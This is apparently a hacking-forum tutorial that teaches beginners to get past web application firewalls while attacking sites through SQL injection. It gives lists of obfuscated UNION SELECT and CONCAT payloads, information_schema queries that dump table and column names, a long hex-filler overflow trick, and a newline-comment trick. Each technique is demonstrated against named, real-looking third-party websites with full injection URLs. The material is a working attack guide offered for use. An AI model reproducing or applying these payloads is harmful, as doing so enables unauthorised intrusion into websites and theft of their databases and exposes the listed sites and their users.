WAF Bypassing For beginners and Easy

First sorry for my english and I make thread about WAF bypassing error For beginners

☆¸.•*☆ How to know if Web Application Firewalls! on/off ☆*•.¸☆

to know this we will use this statement after site link

PHP Code:

or '1'='1' -- 

if Web Application Firewalls! off you only see error normal like

demo

PHP Code:

www.marinaplast.com/page.php?id=13 or '1'='1' -- 

but if Web Application Firewalls! on you will see error like forbiden and Not Acceptable

demo

PHP Code:

http://nbnewsxpress.com/news.php?id=28 or '1'='1' -- 

Spoiler (Click to View)

PHP Code:

http://www.avmaniacs.com/review.php?id=1718 or '1'='1' -- 

Spoiler (Click to View)

☆¸.•*☆ How to inject site with Web Application Firewalls! on ☆*•.¸☆

I have site after I use order+by to now column count I found it 27 column like this .

PHP Code:

http://www.avmaniacs.com/review.php?id=-1718 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- 

Spoiler (Click to View)

☆¸.•*☆ How to bypassing this error [ forbiden ] ☆*•.¸☆

you must feltered union select

I Collected to you some of strong waf bypassing

PHP Code:

+union+distinct+select+

+union+distinctROW+select+

+%2F**/+Union/*!select*/

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/uniUNIONon/**/selSELECTect/**/+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

+/*!u%6eion*/+/*!se%6cect*/+

%55nion %53elect

union(select(1),2,3)union (select 1111,2222,3333)union  (/*!/**/ SeleCT */ 11) 

☆¸.•*☆ demo ☆*•.¸☆

PHP Code:

http://www.avmaniacs.com/review.php?id=-1718 +union+distinct+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- 

Spoiler (Click to View)

and we know when we used requested Query we will have forbiden

PHP Code:

http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+ group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 ​ 1,22,23,24,25,26,27 from information_schema.tables where table_schema=database()---- 

Spoiler (Click to View)

and to bypassing this I Collected to you strong waf bypassing requested Query

☆¸.•*☆ tables ☆*•.¸☆

PHP Code:

group_concat(/*!table_name*/) 

PHP Code:

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - 

☆¸.•*☆ OR ☆*•.¸☆

PHP Code:

/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()-- - 

☆¸.•*☆ columns ☆*•.¸☆

PHP Code:

group_concat(/*!column_name*/) 

PHP Code:

+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table 

☆¸.•*☆ OR ☆*•.¸☆

PHP Code:

/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table 

PHP Code:

/*!froM*/ table-- - 

☆¸.•*☆ demo ☆*•.¸☆

PHP Code:

http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+ group_concat(/*!table_name*/),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - 

Spoiler (Click to View)

Oh forbiden but don't wory this mean the problem in concat

ok let's delet group and bypassing concat like this /*!50000cOnCat*/

☆¸.•*☆ OR ☆*•.¸☆

PHP Code:

/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)CoNcAt()concat%00() CON%08CAT()
%00CoNcAt() 

☆¸.•*☆ demo ☆*•.¸☆

PHP Code:

http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+/*!50000cOnCat*/(/*!table_name*/),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - 

Spoiler (Click to View)

Or we can use concat_ws(0x3a3a3a,) like this

PHP Code:

http://www.avmaniacs.com/review.php?id=-1718+union+distinct+select+concat_ws(0x3a3a3a,/*!table_name*/),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - 

Spoiler (Click to View)

☆¸.•*☆ OR ☆*•.¸☆

PHP Code:

concat(0x3a,,0x3c62723e)/*!concat_ws(0x3a,)*/CONCAT_WS(CHAR(32,58,32),) 

☆¸.•*☆ method 2 BoF+Attacks ☆*•.¸☆

we can use BoF+Attacks Query to bypassing error forbiden and 500 Internal server error too

let's see

PHP Code:

www.bryansmarine.com/details.php?id=319 union select 1 

Spoiler (Click to View)

now to Skip this error 500 Internal server error or 500 forbiden we use BoF+Attacks Query

PHP Code:

+And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​1414141)+ 

If this Query doesn't work we can use this Query [ 1000 of A ]

PHP Code:

+and (/*!select*/ 1)=(/*!select*/ 0xAA)+ 

ok now we will put this Query befor union select to bypassing erro

☆¸.•*☆ demo ☆*•.¸☆

PHP Code:

www.bryansmarine.com/details.php?id=319+And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​1414141)+union select 1 

Spoiler (Click to View)

aha now we have this error

PHP Code:

Unknown table 'articles' in field list 

it's mean column count is not right now we try play with number of column
any way I found column count it's 35 #

☆¸.•*☆ demo ☆*•.¸☆

PHP Code:

www.bryansmarine.com/details.php?id=319+And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414 ​1414141)+union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- 

Spoiler (Click to View)

☆¸.•*☆# 400 bad request # thx benzi # ☆*•.¸☆

If we have error 400 bad request like this

PHP Code:

tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, ​29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 +--+/ 

Spoiler (Click to View)

it's mean : Your browser sent a request that this server could not understand .
and to bypassing this erro

first we need to know from where this error begin do like this

PHP Code:

tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union 

nothing happening no 400 bad request error

PHP Code:

tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 

nothing happening no 400 bad request error

PHP Code:

tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1 +--+/ 

nothing happening no 400 bad request error

PHP Code:

tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 +--+/ 

nothing happening no 400 bad request error

PHP Code:

tibikra.huntscape.lt/highscore/personal.php?name=lauras469' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+/ 

Oh 400 bad request error
now we know this error begining from column 19 that's appear no error and to bypassing this error we will add --+%0A after nomber of column like this

PHP Code:

19--+%0A,20--+%0A,21--+%0A  etc .... 

☆¸.•*☆ demo ☆*•.¸☆

PHP Code:

http://tibikra.huntscape.lt/highscore/personal.php?name=lauras469'and false UNION select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+%0A,20--+%0A,21--+%0A,22--+%0A,23--+%0A,24--+%0A,25--+%0A,26--+%0A,27--+%0A,28--+%0A,29--+%0A,30--+%0A,31--+%0A,32--+%0A,33--+%0A,34--+%0A,35--+%0A,36--+%0A,37--+%0A,38--+%0A,39--+%0A,40--+%0A,41--+%0A,42--+%0A,43--+%0A,44--+%0A,45--+%0A,46--+%0A,47--+%0A,48--+%0A,49--+ 

hackforums.net